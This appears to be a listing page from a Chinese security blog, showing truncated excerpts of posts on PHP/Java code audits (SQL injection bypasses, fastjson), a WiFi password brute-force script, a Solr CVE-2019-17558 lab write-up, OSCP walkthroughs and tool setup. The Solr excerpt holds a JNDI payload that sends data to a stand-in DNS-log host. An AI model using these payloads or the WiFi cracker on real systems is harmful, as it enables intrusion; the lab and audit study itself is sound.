【PHP代码审计】Bluecms代码审计
一、前端SQL注入 - ad_js.php漏洞点在如下位置:没有进行过滤或防护直接拼接sql语句
但是在上面包含文件/include/common.inc.php中,存在对GET、POST、COOKIE使用addslashes 进行的统一过滤
1234567891011function deep_addslashes($str){ if(is_array($str)){ foreach($str as $key=>$val){ $str[$key] = deep_addslashes($val); } } else{ $str = addslashes($str); } return $str;}
因此,单引号、双引号、反斜杠在get、post、cookie中将被转义。
此时的绕过方式也有很多:
使用十六进制编码
此cms使用了gbk编码,通过宽字节来绕过
在$db->getone()的底层使用的是mysql_query
12345678910111213function qu ...
【Java代码审计】华夏-ERPv2.3
一、环境搭建1、下载:下载地址(v2.3版本):Releases · jishenghua/jshERP
2、导入IDEA中,在设置中配置java 环境为1.8,越低越好吧,我是用的是1.8.0_65
3、在MySQL数据库新建jsh_erp数据库
4、导入docs/jsh_erp.sql数据文件
5、在application.properties配置文件中修改MySQL数据库地址端口和账号密码
6、更新加载pom.xml配置文件
7、运行ErpApplication.java文件,启动项目。启动成功会出现访问地址和端口,以及账号的账号密码
二、审计准备先大致浏览下整个项目的大致结构和配置信息
1、pom.xml 配置信息使用了1.2.55 版本的fastjson,具备fastjson 反序列化的版本要求
12345<dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.55&l ...
【Python武器库】Python Wifi密码破解-Wifi万能钥匙
Python Wifi密码破解 - Wifi万能钥匙一、Py模块安装1pip install comtypes
二、使用1python PyWifi.py
三、字典设置默认使用py 脚本同目录下的pass.txt 文件作为字典,可以修改字典位置,或置为空,在代码运行中选择字典位置
1wifi_dic_path = "pass.txt" # 字典设置
字典可以社工获取wifi 相关人员信息制作而成,成功率更高
【Python武器库】成长型工具箱-Comprehensive_Growth_Toolbox
成长型工具箱—Comprehensive-Growth-Toolbox零、个人使用
一、工具箱特色简介一、自主定义菜单栏和导航栏。可以伴随用户在从小白到大佬的整学习及使用的过程中不断收集工具,对工具做分类汇总, 让用户对工具变的更加趁手和深入应用。打造属于自己独有的工具箱
二、工具箱具备强大的多种环境应对能力。在面对 Windows、Linux 等以及红队、蓝队等不同的环境下依然能够让用户有工具可用,快速上手工作
三、工具箱具备面对工具的多种情况。根据工具的绝对路径、相对路径以及未安装 等情况做了不同的处理。
绝对路径:适用于本机已经安装且无法移动的工具
相对路径:可以跟随工具箱一起移动,方便备份或者赠与他人
文件夹路径:方便手动启动的工具,可以直接打开工具所处的文件夹,以便应对更加复杂的情况,或zip等工具压缩包,使用时解压等情况
下载地址:方便多数不常用的且占据内存的小工具,只需要把他的下载路径保存下来,可以达到随用随下载,不占据内存
工具地址:某些工具运行在docker 或者其他虚拟机等网页地址,我们可以将其地址写入,点击即可直接用浏览器打开该网页
在使用前请先下载必要 ...
【Vulfocus系列】Apache Solr代码执行漏洞 (CVE-2019-17558)
一、Apache Solr代码执行漏洞(CVE-2019-17558)简介Solr是Apache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,然后get访问接口导致服务器命令执行。
影响范围:
5.0.0 到 8.3.1版本
二、首页
发现是8.1.1,存在CVE-2019-17558 漏洞
三、手工payload1http://xxx.com/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
成功执行命令,获取java 的版本号
四、开启 params.resource.loader.enabled未授权访问 /solr/demo/co ...
【课外经验】OpenVPN配置自己的加速器
一、OpenVPN 服务端设置1、配置Openvpn 服务端,需要在阿*云等vps 服务器上设置,先安装
1sudo apt install openvpn
2、安装 OpenVPN 后,我们需要生成用于 VPN 隧道加密的静态密钥:
1openvpn --genkey --secret static-OpenVPN.key
3、接下来,我们需要启动 OpenVPN 服务端,并用& 将服务端放置在后台
1sudo openvpn --dev tun --ifconfig 172.16.0.1 172.16.0.2 --cipher AES-256-CBC --secret static-OpenVPN.key &
4、如果操作正确,vps 现在应该有一个名为 tun0 的新网络接口,其 IP 地址为 172.16.0.1
输入以下命令进行验证:
1ip a show tun0
5、要进一步验证 VPN 服务器是否正常运行,请检查系统上的 UDP 端口 1194 是否已打开:
1netstat -anu | grep 1194
有输出则确认VPN 服务器正常运行 ...
【OSCP系列】OSCP靶机—Vegeta
一、主机发现
二、端口扫描1、全端口扫描
只开放22、80端口,加上UDP扫描
2、服务版本探测
80的Apache 使用 2.4.38版本,有关这个版本在一定条件下是存在漏洞的,系统跑在Linux 4.x|5.x
3、漏洞探测
80端口只扫了一些目录
三、HTTP信息收集1、首页源代码
首页就一张图片
看过了,没捆绑没隐写
2、目录扫描gobuster扫描结果,发现四个目录,其中admin 令我们很感兴趣
/admin 里面只有一个 admin.php 文件
推测有类似ctf 那样有源码泄露的地方,但是这个文件夹就它一个文件,且字节大小只有9
robots.txt 文件给出了提示
指向了一个Vegeta-1.0的提示
在页面源代码给出了base64编码的内容
1<!-- aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9B ...
【OSCP系列】OSCP靶机—Seppuku
OSCP系列靶机—Seppuku一、主机发现
二、端口扫描1、快速探测
2、全端口扫描
同时探测UDP常用的20个端口,没有准确的开放端口
3、服务版本探测
给了很多版本和服务的信息,以及推测存在于linux 4.x|5.x 的版本,版本较高
80端口的HTTP服务提示401未授权,7080开放在一个携带ssl 的http服务,7601、8088都开放了一个http服务
4、漏洞探测
在80端口显示很多目录文件,但是都给出401 未授权提示
7080端口给出一个empowerid 服务,网查了一下,可以搜索官网深入了解
EmpowerID 是一款身份管理和访问控制解决方案,它提供了一套全面的服务来帮助企业安全地管理用户的身份和访问权限。
这里nmap给出了CVE-2010-2333 的漏洞,表明这个服务存在一个源代码泄露的CVE编号漏洞,在后面的渗透过程中可能存在利用
8088 端口给出了一个易受DOs攻击的薄弱点,再次给出了CVE-2010-2333 的漏洞,并在后面给出了一个html 页面的源代码
在针对主机的脚本扫描中,指出smb服务易受smb-vuln-regsvc ...
【OSCP系列】OSCP靶机-noontide
OSCP系列靶机—InfosecPrep一、主机发现
二、端口扫描1、快速扫描
2、全端口扫描
探测全tcp 端口,并探测常用的20个UDP端口
tcp 有几个陌生的协议,udp基本上处于全关闭状态
上网搜寻了有关IRC 协议的信息
IRC,即Internet Relay Chat(互联网中继聊天),是一种用于在线通信的协议。它允许用户在实时环境中通过文本消息进行交流。IRC 协议最初在1988年由Jarkko Oikarinen创建,主要目的是为了提供一个多用户实时聊天系统。用户可以加入不同的“频道”或“房间”,在那里与其他人进行交流。
3、服务版本探测
给了我们IRC协议的版本信息,和一个Admin 用户和 一个邮箱,不过好像没啥用昂;推测可能的版本在 Linux 3.5或Linux 3.1 的可能性大,系统版本较低,可能存在脏牛提权
4、漏洞探测
没啥消息
三、IRC协议GETshell有兴趣可以在在kali 中安装irrsi 的IRC 客户端工具启动
第一次启动会给我们很多的信息,表示如果你是第一次使用可以去官网看一看使用手册,/HELP命令可以查看帮助文档。
不过我们 ...
【其他经验】CMD终端美化记录—oh-my-posh
【其他经验】CMD终端美化记录—oh-my-posh一、安装Windows Terminal1、简单介绍下Windows Terminal 是微软开发的一款新的终端应用程序,它为命令行工具提供了一个现代化的界面。它支持 PowerShell、命令提示符(cmd)、WSL(Windows Subsystem for Linux)等多种命令行工具。Windows Terminal 不是 cmd,但它可以运行 cmd。
2、下载地址1、微软自带的应用商店(推荐)
2、GitHub 目前最新版下载地址:https://github.com/microsoft/terminal/releases/
这里推荐使用微软自带的应用商店下载,有些配置会默认帮我们配置好
3、启动方式【win + R 输入wt 】即可启动
4、配置成默认启动方式在【设置】中配置默认终端应用程序,这样使用【cmd】命令即可打开该程序,右下角记得保存
二、安装nerd 字体1、nerd 字体介绍因为oh-my-post 在使用中有多个特殊字符,为了不显示乱码的情况,官方推荐使用 nerd fonts 字体
2、下载方式1、官 ...